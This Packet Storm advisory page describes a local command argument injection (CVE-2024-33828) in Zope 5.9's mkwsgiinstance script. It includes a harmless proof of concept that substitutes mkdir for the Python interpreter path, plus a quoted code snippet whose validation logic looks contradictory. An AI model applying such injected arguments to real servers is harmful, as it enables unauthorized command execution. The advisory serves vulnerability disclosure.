what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Zope 5.9 Command Injection

Zope 5.9 Command Injection
Posted May 15, 2024
Authored by Ilyase Dehy, Aymane MAZGUITI

Zope version 5.9 suffers from a command injection vulnerability in /utilities/mkwsgiinstance.py.

tags | exploit
advisories | CVE-2024-33828
SHA-256 | 1849107b888555128ddb84f1932e592e1a6cec7bad8f090a967908069ab52d02

Zope 5.9 Command Injection

Change Mirror Download
# Vulnerability Report

## Title: Command Argument Injection Vulnerability in Zope WSGI Instance Creation Script Leading to RCE

### Description:
A command Argument injection vulnerability has been identified in the Zope WSGI instance creation script used by the Zope web application server framework, which is maintained by the Zope Foundation. The script, mkwsgiinstance, facilitates the setup of new Zope WSGI application instances and involves specifying the Python interpreter among other parameters via command-line arguments. The flaw stems from insufficient validation of the Python interpreter path, allowing an attacker to execute arbitrary shell commands.

### Affected Product:
Product: Zope WSGI instance creation script (mkwsgiinstance)
Version: All versions prior to the most recent update

-Impact:
This vulnerability permits an attacker with local access to the server to execute arbitrary commands with the privileges of the user running the mkwsgiinstance script. The potential impacts include unauthorized information disclosure
### POC:

```bash

(env) root@lab:/opt/Zope# mkwsgiinstance -p "/usr/bin/mkdir" -d "/tmp/temp;"
Please choose a username and password for the initial user.
These will be the credentials you use to initially manage
your new Zope instance.

Username: d
Password:
Verify password:
(env) root@lab:/opt/Zope# ls /tmp
'temp;'
```

In this example, the attacker replaces the Python interpreter argument (-p) with the mkdir command, followed by an arbitrary directory path. Due to inadequate command-line argument sanitation, the script executes the mkdir command, thus illustrating arbitrary command execution.

### Vulnerable Code Snippet:

```python

if opt in ("-p", "--python"):
python = os.path.abspath(os.path.expanduser(arg))
if not os.path.exists(python) and os.path.isfile(python):
usage(sys.stderr, "The Python interpreter does not exist.")
sys.exit(2)
```

This code snippet fails to adequately validate the python variable that influences subprocess commands directly, enabling potential command injection when malicious inputs are utilized.

CVSS Calculated Vulnerability Score:
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

### Credits:

This vulnerability was disclosed by Aymane MAZGUITI / Ilyase Dehy.
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close